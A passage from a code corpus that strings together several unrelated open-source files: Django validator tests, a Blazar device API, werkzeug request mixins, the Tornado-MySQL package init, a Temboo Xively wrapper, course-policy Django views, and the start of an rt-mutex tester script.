(validate_unicode_slug, 'nohyphensoranything', None),
(validate_unicode_slug, 'a', None),
(validate_unicode_slug, '1', None),
(validate_unicode_slug, 'a1', None),
(validate_unicode_slug, '你好', None),
(validate_unicode_slug, '', ValidationError),
(validate_unicode_slug, ' text ', ValidationError),
(validate_unicode_slug, ' ', ValidationError),
(validate_unicode_slug, 'some@mail.com', ValidationError),
(validate_unicode_slug, '\n', ValidationError),
(validate_unicode_slug, '你 好', ValidationError),
(validate_unicode_slug, 'trailing-newline\n', ValidationError),
(validate_ipv4_address, '1.1.1.1', None),
(validate_ipv4_address, '255.0.0.0', None),
(validate_ipv4_address, '0.0.0.0', None),
(validate_ipv4_address, '256.1.1.1', ValidationError),
(validate_ipv4_address, '25.1.1.', ValidationError),
(validate_ipv4_address, '25,1,1,1', ValidationError),
(validate_ipv4_address, '25.1 .1.1', ValidationError),
(validate_ipv4_address, '1.1.1.1\n', ValidationError),
# validate_ipv6_address uses django.utils.ipv6, which
# is tested in much greater detail in its own testcase
(validate_ipv6_address, 'fe80::1', None),
(validate_ipv6_address, '::1', None),
(validate_ipv6_address, '1:2:3:4:5:6:7:8', None),
(validate_ipv6_address, '1:2', ValidationError),
(validate_ipv6_address, '::zzz', ValidationError),
(validate_ipv6_address, '12345::', ValidationError),
(validate_ipv46_address, '1.1.1.1', None),
(validate_ipv46_address, '255.0.0.0', None),
(validate_ipv46_address, '0.0.0.0', None),
(validate_ipv46_address, 'fe80::1', None),
(validate_ipv46_address, '::1', None),
(validate_ipv46_address, '1:2:3:4:5:6:7:8', None),
(validate_ipv46_address, '256.1.1.1', ValidationError),
(validate_ipv46_address, '25.1.1.', ValidationError),
(validate_ipv46_address, '25,1,1,1', ValidationError),
(validate_ipv46_address, '25.1 .1.1', ValidationError),
(validate_ipv46_address, '1:2', ValidationError),
(validate_ipv46_address, '::zzz', ValidationError),
(validate_ipv46_address, '12345::', ValidationError),
(validate_comma_separated_integer_list, '1', None),
(validate_comma_separated_integer_list, '12', None),
(validate_comma_separated_integer_list, '1,2', None),
(validate_comma_separated_integer_list, '1,2,3', None),
(validate_comma_separated_integer_list, '10,32', None),
(validate_comma_separated_integer_list, '', ValidationError),
(validate_comma_separated_integer_list, 'a', ValidationError),
(validate_comma_separated_integer_list, 'a,b,c', ValidationError),
(validate_comma_separated_integer_list, '1, 2, 3', ValidationError),
(validate_comma_separated_integer_list, ',', ValidationError),
(validate_comma_separated_integer_list, '1,2,3,', ValidationError),
(validate_comma_separated_integer_list, '1,2,', ValidationError),
(validate_comma_separated_integer_list, ',1', ValidationError),
(validate_comma_separated_integer_list, '1,,2', ValidationError),
(int_list_validator(sep='.'), '1.2.3', None),
(int_list_validator(sep='.'), '1,2,3', ValidationError),
(int_list_validator(sep='.'), '1.2.3\n', ValidationError),
(MaxValueValidator(10), 10, None),
(MaxValueValidator(10), -10, None),
(MaxValueValidator(10), 0, None),
(MaxValueValidator(NOW), NOW, None),
(MaxValueValidator(NOW), NOW - timedelta(days=1), None),
(MaxValueValidator(0), 1, ValidationError),
(MaxValueValidator(NOW), NOW + timedelta(days=1), ValidationError),
(MinValueValidator(-10), -10, None),
(MinValueValidator(-10), 10, None),
(MinValueValidator(-10), 0, None),
(MinValueValidator(NOW), NOW, None),
(MinValueValidator(NOW), NOW + timedelta(days=1), None),
(MinValueValidator(0), -1, ValidationError),
(MinValueValidator(NOW), NOW - timedelta(days=1), ValidationError),
(MaxLengthValidator(10), '', None),
(MaxLengthValidator(10), 10 * 'x', None),
(MaxLengthValidator(10), 15 * 'x', ValidationError),
(MinLengthValidator(10), 15 * 'x', None),
(MinLengthValidator(10), 10 * 'x', None),
(MinLengthValidator(10), '', ValidationError),
(URLValidator(EXTENDED_SCHEMES), 'file://localhost/path', None),
(URLValidator(EXTENDED_SCHEMES), 'git://example.com/', None),
(URLValidator(EXTENDED_SCHEMES), 'git://-invalid.com', ValidationError),
# Trailing newlines not accepted
(URLValidator(), 'http://www.djangoproject.com/\n', ValidationError),
(URLValidator(), 'http://[::ffff:192.9.5.5]\n', ValidationError),
# Trailing junk does not take forever to reject
(URLValidator(), 'http://www.asdasdasdasdsadfm.com.br ', ValidationError),
(URLValidator(), 'http://www.asdasdasdasdsadfm.com.br z', ValidationError),
(BaseValidator(True), True, None),
(BaseValidator(True), False, ValidationError),
(RegexValidator(), '', None),
(RegexValidator(), 'x1x2', None),
(RegexValidator('[0-9]+'), 'xxxxxx', ValidationError),
(RegexValidator('[0-9]+'), '1234', None),
(RegexValidator(re.compile('[0-9]+')), '1234', None),
(RegexValidator('.*'), '', None),
(RegexValidator(re.compile('.*')), '', None),
(RegexValidator('.*'), 'xxxxx', None),
(RegexValidator('x'), 'y', ValidationError),
(RegexValidator(re.compile('x')), 'y', ValidationError),
(RegexValidator('x', inverse_match=True), 'y', None),
(RegexValidator(re.compile('x'), inverse_match=True), 'y', None),
(RegexValidator('x', inverse_match=True), 'x', ValidationError),
(RegexValidator(re.compile('x'), inverse_match=True), 'x', ValidationError),
(RegexValidator('x', flags=re.IGNORECASE), 'y', ValidationError),
(RegexValidator('a'), 'A', ValidationError),
(RegexValidator('a', flags=re.IGNORECASE), 'A', None),
]
def create_path(filename):
return os.path.abspath(os.path.join(os.path.dirname(upath(__file__)), filename))
# Add valid and invalid URL tests.
# This only tests the validator without extended schemes.
with io.open(create_path('valid_urls.txt'), encoding='utf8') as f:
for url in f:
TEST_DATA.append((URLValidator(), url.strip(), None))
with io.open(create_path('invalid_urls.txt'), encoding='utf8') as f:
for url in f:
TEST_DATA.append((URLValidator(), url.strip(), ValidationError))
def create_simple_test_method(validator, expected, value, num):
if expected is not None and issubclass(expected, Exception):
test_mask = 'test_%s_raises_error_%d'
def test_func(self):
# assertRaises not used, so as to be able to produce an error message
# containing the tested value
try:
validator(value)
except expected:
pass
else:
self.fail("%s not raised when validating '%s'" % (
expected.__name__, value))
else:
test_mask = 'test_%s_%d'
def test_func(self):
try:
self.assertEqual(expected, validator(value))
except ValidationError as e:
self.fail("Validation of '%s' failed. Error message was: %s" % (
value, str(e)))
if isinstance(validator, types.FunctionType):
val_name = validator.__name__
else:
val_name = validator.__class__.__name__
test_name = test_mask % (val_name, num)
return test_name, test_func
# Dynamically assemble a test class with the contents of TEST_DATA
class TestSimpleValidators(SimpleTestCase):
def test_single_message(self):
v = ValidationError('Not Valid')
self.assertEqual(str(v), str_prefix("[%(_)s'Not Valid']"))
self.assertEqual(repr(v), str_prefix("ValidationError([%(_)s'Not Valid'])"))
def test_message_list(self):
v = ValidationError(['First Problem', 'Second Problem'])
self.assertEqual(str(v), str_prefix("[%(_)s'First Problem', %(_)s'Second Problem']"))
self.assertEqual(repr(v), str_prefix("ValidationError([%(_)s'First Problem', %(_)s'Second Problem'])"))
def test_message_dict(self):
v = ValidationError({'first': ['First Problem']})
self.assertEqual(str(v), str_prefix("{%(_)s'first': [%(_)s'First Problem']}"))
self.assertEqual(repr(v), str_prefix("ValidationError({%(_)s'first': [%(_)s'First Problem']})"))
def test_regex_validator_flags(self):
try:
RegexValidator(re.compile('a'), flags=re.IGNORECASE)
except TypeError:
pass
else:
self.fail("TypeError not raised when flags and pre-compiled regex in RegexValidator")
def test_max_length_validator_message(self):
v = MaxLengthValidator(16, message='"%(value)s" has more than %(limit_value)d characters.')
with self.assertRaisesMessage(ValidationError, '"djangoproject.com" has more than 16 characters.'):
v('djangoproject.com')
test_counter = 0
for validator, value, expected in TEST_DATA:
name, method = create_simple_test_method(validator, expected, value, test_counter)
setattr(TestSimpleValidators, name, method)
test_counter += 1
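# For example, the first entry (validate_integer, '42', None) becomes a method
# named 'test_validate_integer_0' on TestSimpleValidators, while an entry that
# expects an exception becomes 'test_<validator>_raises_error_<n>'.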
class TestValidatorEquality(TestCase):
"""
Tests that validators have valid equality operators (#21638)
"""
def test_regex_equality(self):
self.assertEqual(
RegexValidator(r'^(?:[a-z0-9\.\-]*)://'),
RegexValidator(r'^(?:[a-z0-9\.\-]*)://'),
)
self.assertNotEqual(
RegexValidator(r'^(?:[a-z0-9\.\-]*)://'),
RegexValidator(r'^(?:[0-9\.\-]*)://'),
)
self.assertEqual(
RegexValidator(r'^(?:[a-z0-9\.\-]*)://', "oh noes", "invalid"),
RegexValidator(r'^(?:[a-z0-9\.\-]*)://', "oh noes", "invalid"),
)
self.assertNotEqual(
RegexValidator(r'^(?:[a-z0-9\.\-]*)://', "oh", "invalid"),
RegexValidator(r'^(?:[a-z0-9\.\-]*)://', "oh noes", "invalid"),
)
self.assertNotEqual(
RegexValidator(r'^(?:[a-z0-9\.\-]*)://', "oh noes", "invalid"),
RegexValidator(r'^(?:[a-z0-9\.\-]*)://'),
)
self.assertNotEqual(
RegexValidator('', flags=re.IGNORECASE),
RegexValidator(''),
)
self.assertNotEqual(
RegexValidator(''),
RegexValidator('', inverse_match=True),
)
def test_regex_equality_nocache(self):
pattern = r'^(?:[a-z0-9\.\-]*)://'
left = RegexValidator(pattern)
re.purge()
right = RegexValidator(pattern)
self.assertEqual(
left,
right,
)
def test_regex_equality_blank(self):
self.assertEqual(
RegexValidator(),
RegexValidator(),
)
def test_email_equality(self):
self.assertEqual(
EmailValidator(),
EmailValidator(),
)
self.assertNotEqual(
EmailValidator(message="BAD EMAIL"),
EmailValidator(),
)
self.assertEqual(
EmailValidator(message="BAD EMAIL", code="bad"),
EmailValidator(message="BAD EMAIL", code="bad"),
)
def test_basic_equality(self):
self.assertEqual(
MaxValueValidator(44),
MaxValueValidator(44),
)
self.assertNotEqual(
MaxValueValidator(44),
MinValueValidator(44),
)
self.assertNotEqual(
MinValueValidator(45),
MinValueValidator(11),
)
| bsd-3-clause |
ChameleonCloud/blazar | blazar/api/v1/devices/service.py | 1 | 3761 | # Copyright (c) 2018 StackHPC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from blazar import context
from blazar.manager.devices import rpcapi as manager_rpcapi
from blazar import policy
from blazar.utils import trusts
class API(object):
def __init__(self):
self.manager_rpcapi = manager_rpcapi.ManagerRPCAPI()
@policy.authorize('devices', 'get')
def get_devices(self):
"""List all existing devices."""
return self.manager_rpcapi.list_devices()
@policy.authorize('devices', 'post')
@trusts.use_trust_auth()
def create_device(self, data):
"""Create new device.
:param data: New device characteristics.
:type data: dict
"""
return self.manager_rpcapi.create_device(data)
@policy.authorize('devices', 'get')
def get_device(self, device_id):
"""Get device by its ID.
:param device_id: ID of the device in Blazar DB.
:type device_id: str
"""
return self.manager_rpcapi.get_device(device_id)
@policy.authorize('devices', 'put')
def update_device(self, device_id, data):
"""Update device.
:param device_id: ID of the device in Blazar DB.
:type device_id: str
:param data: New device characteristics.
:type data: dict
"""
return self.manager_rpcapi.update_device(device_id, data)
@policy.authorize('devices', 'delete')
def delete_device(self, device_id):
"""Delete specified device.
:param device_id: ID of the device in Blazar DB.
:type device_id: str
"""
self.manager_rpcapi.delete_device(device_id)
@policy.authorize('devices', 'reallocate')
def reallocate(self, device_id, data):
"""Exchange device from allocations."""
return self.manager_rpcapi.reallocate(device_id, data)
@policy.authorize('devices', 'get_allocations')
def list_allocations(self, query):
"""List all allocations on all devices.
:param query: parameter to query allocations
:type query: dict
"""
ctx = context.current()
detail = False
if policy.enforce(ctx, 'admin', {}, do_raise=False):
detail = True
return self.manager_rpcapi.list_allocations(query, detail=detail)
@policy.authorize('devices', 'get_allocations')
def get_allocations(self, device_id, query):
"""List all allocations on a specificied device.
        :param device_id: ID of the device in Blazar DB.
:type device_id: str
:param query: parameters to query allocation
:type query: dict
"""
return self.manager_rpcapi.get_allocations(device_id, query)
@policy.authorize('devices', 'get_resource_properties')
def list_resource_properties(self, query):
"""List resource properties for devices."""
return self.manager_rpcapi.list_resource_properties(query)
@policy.authorize('devices', 'patch_resource_properties')
def update_resource_property(self, property_name, data):
"""Update a device resource property."""
return self.manager_rpcapi.update_resource_property(property_name,
data)
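# A minimal usage sketch (identifiers are illustrative; the v1 REST layer in
# blazar.api.v1.devices normally drives this class rather than callers doing
# so directly):
#
#   api = API()
#   api.get_devices()                                 # list every device
#   api.update_device('dev-uuid', {'name': 'cam-3'})  # update one device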
| apache-2.0 |
jcmarks/jcmarks-mobile | lib/werkzeug/contrib/wrappers.py | 318 | 10331 | # -*- coding: utf-8 -*-
"""
werkzeug.contrib.wrappers
~~~~~~~~~~~~~~~~~~~~~~~~~
Extra wrappers or mixins contributed by the community. These wrappers can
be mixed in into request objects to add extra functionality.
Example::
from werkzeug.wrappers import Request as RequestBase
from werkzeug.contrib.wrappers import JSONRequestMixin
class Request(RequestBase, JSONRequestMixin):
pass
Afterwards this request object provides the extra functionality of the
:class:`JSONRequestMixin`.
:copyright: (c) 2013 by the Werkzeug Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import codecs
try:
from simplejson import loads
except ImportError:
from json import loads
from werkzeug.exceptions import BadRequest
from werkzeug.utils import cached_property
from werkzeug.http import dump_options_header, parse_options_header
from werkzeug._compat import wsgi_decoding_dance
def is_known_charset(charset):
"""Checks if the given charset is known to Python."""
try:
codecs.lookup(charset)
except LookupError:
return False
return True
class JSONRequestMixin(object):
"""Add json method to a request object. This will parse the input data
through simplejson if possible.
:exc:`~werkzeug.exceptions.BadRequest` will be raised if the content-type
is not json or if the data itself cannot be parsed as json.
"""
@cached_property
def json(self):
"""Get the result of simplejson.loads if possible."""
if 'json' not in self.environ.get('CONTENT_TYPE', ''):
raise BadRequest('Not a JSON request')
try:
return loads(self.data)
except Exception:
raise BadRequest('Unable to read JSON request')
class ProtobufRequestMixin(object):
"""Add protobuf parsing method to a request object. This will parse the
input data through `protobuf`_ if possible.
:exc:`~werkzeug.exceptions.BadRequest` will be raised if the content-type
is not protobuf or if the data itself cannot be parsed property.
.. _protobuf: http://code.google.com/p/protobuf/
"""
#: by default the :class:`ProtobufRequestMixin` will raise a
#: :exc:`~werkzeug.exceptions.BadRequest` if the object is not
#: initialized. You can bypass that check by setting this
#: attribute to `False`.
protobuf_check_initialization = True
def parse_protobuf(self, proto_type):
"""Parse the data into an instance of proto_type."""
if 'protobuf' not in self.environ.get('CONTENT_TYPE', ''):
raise BadRequest('Not a Protobuf request')
obj = proto_type()
try:
obj.ParseFromString(self.data)
except Exception:
raise BadRequest("Unable to parse Protobuf request")
# Fail if not all required fields are set
if self.protobuf_check_initialization and not obj.IsInitialized():
raise BadRequest("Partial Protobuf request")
return obj
class RoutingArgsRequestMixin(object):
"""This request mixin adds support for the wsgiorg routing args
`specification`_.
.. _specification: http://www.wsgi.org/wsgi/Specifications/routing_args
"""
def _get_routing_args(self):
        return self.environ.get('wsgiorg.routing_args', ((), {}))[0]
def _set_routing_args(self, value):
if self.shallow:
raise RuntimeError('A shallow request tried to modify the WSGI '
'environment. If you really want to do that, '
'set `shallow` to False.')
self.environ['wsgiorg.routing_args'] = (value, self.routing_vars)
routing_args = property(_get_routing_args, _set_routing_args, doc='''
The positional URL arguments as `tuple`.''')
del _get_routing_args, _set_routing_args
def _get_routing_vars(self):
rv = self.environ.get('wsgiorg.routing_args')
if rv is not None:
return rv[1]
rv = {}
if not self.shallow:
self.routing_vars = rv
return rv
def _set_routing_vars(self, value):
if self.shallow:
raise RuntimeError('A shallow request tried to modify the WSGI '
'environment. If you really want to do that, '
'set `shallow` to False.')
self.environ['wsgiorg.routing_args'] = (self.routing_args, value)
routing_vars = property(_get_routing_vars, _set_routing_vars, doc='''
The keyword URL arguments as `dict`.''')
del _get_routing_vars, _set_routing_vars
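# A hedged usage sketch for the routing args mixin (names illustrative): after
# a wsgiorg.routing_args-aware router has matched e.g. /user/42, the request
# could expose the captures like this:
#
#   class RoutingRequest(RoutingArgsRequestMixin, Request):
#       pass
#
#   request = RoutingRequest(environ)
#   request.routing_args   # positional matches, e.g. ('42',)
#   request.routing_vars   # keyword matches, e.g. {'id': '42'}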
class ReverseSlashBehaviorRequestMixin(object):
"""This mixin reverses the trailing slash behavior of :attr:`script_root`
and :attr:`path`. This makes it possible to use :func:`~urlparse.urljoin`
directly on the paths.
Because it changes the behavior or :class:`Request` this class has to be
mixed in *before* the actual request class::
class MyRequest(ReverseSlashBehaviorRequestMixin, Request):
pass
This example shows the differences (for an application mounted on
`/application` and the request going to `/application/foo/bar`):
+---------------+-------------------+---------------------+
| | normal behavior | reverse behavior |
+===============+===================+=====================+
| `script_root` | ``/application`` | ``/application/`` |
+---------------+-------------------+---------------------+
| `path` | ``/foo/bar`` | ``foo/bar`` |
+---------------+-------------------+---------------------+
"""
@cached_property
def path(self):
"""Requested path as unicode. This works a bit like the regular path
info in the WSGI environment but will not include a leading slash.
"""
path = wsgi_decoding_dance(self.environ.get('PATH_INFO') or '',
self.charset, self.encoding_errors)
return path.lstrip('/')
@cached_property
def script_root(self):
"""The root path of the script includling a trailing slash."""
path = wsgi_decoding_dance(self.environ.get('SCRIPT_NAME') or '',
self.charset, self.encoding_errors)
return path.rstrip('/') + '/'
class DynamicCharsetRequestMixin(object):
""""If this mixin is mixed into a request class it will provide
a dynamic `charset` attribute. This means that if the charset is
transmitted in the content type headers it's used from there.
Because it changes the behavior or :class:`Request` this class has
to be mixed in *before* the actual request class::
class MyRequest(DynamicCharsetRequestMixin, Request):
pass
By default the request object assumes that the URL charset is the
same as the data charset. If the charset varies on each request
based on the transmitted data it's not a good idea to let the URLs
change based on that. Most browsers assume either utf-8 or latin1
for the URLs if they have troubles figuring out. It's strongly
recommended to set the URL charset to utf-8::
class MyRequest(DynamicCharsetRequestMixin, Request):
url_charset = 'utf-8'
.. versionadded:: 0.6
"""
#: the default charset that is assumed if the content type header
#: is missing or does not contain a charset parameter. The default
#: is latin1 which is what HTTP specifies as default charset.
#: You may however want to set this to utf-8 to better support
#: browsers that do not transmit a charset for incoming data.
default_charset = 'latin1'
def unknown_charset(self, charset):
"""Called if a charset was provided but is not supported by
the Python codecs module. By default latin1 is assumed then
to not lose any information, you may override this method to
change the behavior.
:param charset: the charset that was not found.
:return: the replacement charset.
"""
return 'latin1'
@cached_property
def charset(self):
"""The charset from the content type."""
header = self.environ.get('CONTENT_TYPE')
if header:
ct, options = parse_options_header(header)
charset = options.get('charset')
if charset:
if is_known_charset(charset):
return charset
return self.unknown_charset(charset)
return self.default_charset
class DynamicCharsetResponseMixin(object):
"""If this mixin is mixed into a response class it will provide
a dynamic `charset` attribute. This means that if the charset is
looked up and stored in the `Content-Type` header and updates
itself automatically. This also means a small performance hit but
can be useful if you're working with different charsets on
responses.
    Because the charset attribute is now a property at class-level, the
default value is stored in `default_charset`.
Because it changes the behavior or :class:`Response` this class has
to be mixed in *before* the actual response class::
class MyResponse(DynamicCharsetResponseMixin, Response):
pass
.. versionadded:: 0.6
"""
#: the default charset.
default_charset = 'utf-8'
def _get_charset(self):
header = self.headers.get('content-type')
if header:
charset = parse_options_header(header)[1].get('charset')
if charset:
return charset
return self.default_charset
def _set_charset(self, charset):
header = self.headers.get('content-type')
ct, options = parse_options_header(header)
if not ct:
raise TypeError('Cannot set charset if Content-Type '
'header is missing.')
options['charset'] = charset
self.headers['Content-Type'] = dump_options_header(ct, options)
charset = property(_get_charset, _set_charset, doc="""
The charset for the response. It's stored inside the
Content-Type header as a parameter.""")
del _get_charset, _set_charset
| apache-2.0 |
mosquito/Tornado-MySQL | tornado_mysql/__init__.py | 5 | 4381 | '''
Tornado-MySQL: A pure-Python MySQL client library for Tornado.
Copyright (c) 2010, 2013-2014 PyMySQL contributors
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
'''
VERSION = (0, 6, 3, None)
from ._compat import text_type, JYTHON, IRONPYTHON
from .constants import FIELD_TYPE
from .converters import escape_dict, escape_sequence, escape_string
from .err import Warning, Error, InterfaceError, DataError, \
DatabaseError, OperationalError, IntegrityError, InternalError, \
NotSupportedError, ProgrammingError, MySQLError
from .times import Date, Time, Timestamp, \
DateFromTicks, TimeFromTicks, TimestampFromTicks
import sys
from tornado import gen
threadsafety = 1
apilevel = "2.0"
paramstyle = "format"
class DBAPISet(frozenset):
def __ne__(self, other):
if isinstance(other, set):
            return super(DBAPISet, self).__ne__(other)
else:
return other not in self
def __eq__(self, other):
if isinstance(other, frozenset):
return frozenset.__eq__(self, other)
else:
return other in self
def __hash__(self):
return frozenset.__hash__(self)
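# DBAPISet makes a whole category compare equal to any member type, which is
# what DB-API 2.0 type objects require; e.g. both of these hold:
#
#   FIELD_TYPE.BLOB == BINARY   # True, via the reflected DBAPISet.__eq__
#   BINARY == FIELD_TYPE.BLOB   # True as well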
STRING = DBAPISet([FIELD_TYPE.ENUM, FIELD_TYPE.STRING,
FIELD_TYPE.VAR_STRING])
BINARY = DBAPISet([FIELD_TYPE.BLOB, FIELD_TYPE.LONG_BLOB,
FIELD_TYPE.MEDIUM_BLOB, FIELD_TYPE.TINY_BLOB])
NUMBER = DBAPISet([FIELD_TYPE.DECIMAL, FIELD_TYPE.DOUBLE, FIELD_TYPE.FLOAT,
FIELD_TYPE.INT24, FIELD_TYPE.LONG, FIELD_TYPE.LONGLONG,
FIELD_TYPE.TINY, FIELD_TYPE.YEAR])
DATE = DBAPISet([FIELD_TYPE.DATE, FIELD_TYPE.NEWDATE])
TIME = DBAPISet([FIELD_TYPE.TIME])
TIMESTAMP = DBAPISet([FIELD_TYPE.TIMESTAMP, FIELD_TYPE.DATETIME])
DATETIME = TIMESTAMP
ROWID = DBAPISet()
def Binary(x):
"""Return x as a binary type."""
if isinstance(x, text_type) and not (JYTHON or IRONPYTHON):
return x.encode()
return bytes(x)
@gen.coroutine
def connect(*args, **kwargs):
"""See connections.Connection.__init__() for information about defaults."""
from .connections import Connection
conn = Connection(*args, **kwargs)
yield conn.connect()
raise gen.Return(conn)
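# A minimal usage sketch inside a Tornado coroutine (connection parameters
# below are illustrative placeholders):
#
#   @gen.coroutine
#   def run_query():
#       conn = yield connect(host='127.0.0.1', port=3306,
#                            user='root', passwd='', db='mysql')
#       cur = conn.cursor()
#       yield cur.execute("SELECT Host, User FROM user")
#       for row in cur:
#           print(row)
#       cur.close()
#       conn.close()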
from . import connections as _orig_conn
if _orig_conn.Connection.__init__.__doc__ is not None:
connect.__doc__ = _orig_conn.Connection.__init__.__doc__ + ("""
See connections.Connection.__init__() for information about defaults.
""")
del _orig_conn
def get_client_info(): # for MySQLdb compatibility
return '.'.join(map(str, VERSION))
# we include a doctored version_info here for MySQLdb compatibility
version_info = (1,2,2,"final",0)
NULL = "NULL"
__version__ = get_client_info()
__all__ = [
'BINARY', 'Binary', 'connect', 'Connection', 'DATE', 'Date',
'Time', 'Timestamp', 'DateFromTicks', 'TimeFromTicks', 'TimestampFromTicks',
'DataError', 'DatabaseError', 'Error', 'FIELD_TYPE', 'IntegrityError',
'InterfaceError', 'InternalError', 'MySQLError', 'NULL', 'NUMBER',
'NotSupportedError', 'DBAPISet', 'OperationalError', 'ProgrammingError',
'ROWID', 'STRING', 'TIME', 'TIMESTAMP', 'Warning', 'apilevel',
'connections', 'constants', 'converters', 'cursors',
'escape_dict', 'escape_sequence', 'escape_string', 'get_client_info',
'paramstyle', 'threadsafety', 'version_info',
"NULL","__version__",
]
| mit |
lupyuen/RaspberryPiImage | home/pi/GrovePi/Software/Python/others/temboo/Library/Xively/Products/ListAllProducts.py | 5 | 2970 | # -*- coding: utf-8 -*-
###############################################################################
#
# ListAllProducts
# Returns a JSON representation of all products associated with the specified APIKey.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class ListAllProducts(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the ListAllProducts Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(ListAllProducts, self).__init__(temboo_session, '/Library/Xively/Products/ListAllProducts')
def new_input_set(self):
return ListAllProductsInputSet()
def _make_result_set(self, result, path):
return ListAllProductsResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return ListAllProductsChoreographyExecution(session, exec_id, path)
class ListAllProductsInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the ListAllProducts
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_APIKey(self, value):
"""
Set the value of the APIKey input for this Choreo. ((required, string) The API Key provided by Xively.)
"""
super(ListAllProductsInputSet, self)._set_input('APIKey', value)
class ListAllProductsResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the ListAllProducts Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((json) The response from Xively.)
"""
return self._output.get('Response', None)
class ListAllProductsChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return ListAllProductsResultSet(response, path)
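# Usage sketch (editor's addition, following the pattern documented for the
# Temboo Python SDK; account and key values below are placeholders):
#
#     from temboo.core.session import TembooSession
#
#     session = TembooSession('ACCOUNT_NAME', 'APP_KEY_NAME', 'APP_KEY_VALUE')
#     choreo = ListAllProducts(session)
#     inputs = choreo.new_input_set()
#     inputs.set_APIKey('YOUR_XIVELY_API_KEY')
#     results = choreo.execute_with_results(inputs)
#     print(results.get_Response())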
| apache-2.0 |
AcademicsToday/academicstoday-django | academicstoday_project/teacher/views/policy.py | 3 | 2947 | from django.shortcuts import render
from django.core import serializers
from django.http import HttpResponse
from django.contrib.auth.models import User
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
from django.conf import settings
import json
import datetime
from registrar.models import Teacher
from registrar.models import Course
from registrar.models import Policy
from teacher.forms import PolicyForm
@login_required(login_url='/landpage')
def policy_page(request, course_id):
course = Course.objects.get(id=course_id)
try:
policy = Policy.objects.get(course=course)
except Policy.DoesNotExist:
policy = None
return render(request, 'teacher/policy/view.html',{
'course' : course,
'policy' : policy,
'user' : request.user,
'tab' : 'policy',
'HAS_ADVERTISMENT': settings.APPLICATION_HAS_ADVERTISMENT,
'local_css_urls' : settings.SB_ADMIN_2_CSS_LIBRARY_URLS,
'local_js_urls' : settings.SB_ADMIN_2_JS_LIBRARY_URLS,
})
@login_required(login_url='/landpage')
def policy_modal(request, course_id):
if request.method == u'POST':
form = PolicyForm()
return render(request, 'teacher/policy/modal.html',{'form' : form })
@login_required(login_url='/landpage')
def save_policy(request, course_id):
response_data = {'status' : 'failed', 'message' : 'unknown error with saving'}
if request.is_ajax():
if request.method == 'POST':
form = PolicyForm(request.POST, request.FILES)
if form.is_valid():
course = Course.objects.get(id=course_id)
form.instance.course = course
form.save()
response_data = {'status' : 'success', 'message' : 'saved'}
else:
response_data = {'status' : 'failed', 'message' : json.dumps(form.errors)}
return HttpResponse(json.dumps(response_data), content_type="application/json")
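# Request/response sketch (editor's addition): save_policy expects an AJAX
# POST carrying the PolicyForm fields (plus any file upload) and answers
# with JSON such as {"status": "success", "message": "saved"} or, on
# validation failure, {"status": "failed", "message": "<form errors>"}.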
@login_required(login_url='/landpage')
def delete_policy(request, course_id):
response_data = {'status' : 'failed', 'message' : 'unknown error with deleting'}
if request.is_ajax():
if request.method == 'POST':
policy_id = int(request.POST['policy_id'])
teacher = Teacher.objects.get(user=request.user)
try:
policy = Policy.objects.get(policy_id=policy_id)
if policy.course.teacher == teacher:
policy.delete()
response_data = {'status' : 'success', 'message' : 'deleted'}
else:
response_data = {'status' : 'failed', 'message' : 'unauthorized deletion'}
except Policy.DoesNotExist:
response_data = {'status' : 'failed', 'message' : 'record does not exist'}
return HttpResponse(json.dumps(response_data), content_type="application/json")
| apache-2.0 |
k2wl/KernelEvolution | scripts/rt-tester/rt-tester.py | 11005 | 5307 | #!/usr/bin/python
#
# rt-mutex tester
#
# (C) 2006 Thomas Gleixner <tglx@linutronix.de>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
import os
import sys
import getopt
import shutil
import string
# Globals
quiet = 0
test = 0
comments = 0
sysfsprefix = "/sys/devices/system/rttest/rttest"
statusfile = "/status"
commandfile = "/command"
# Command opcodes
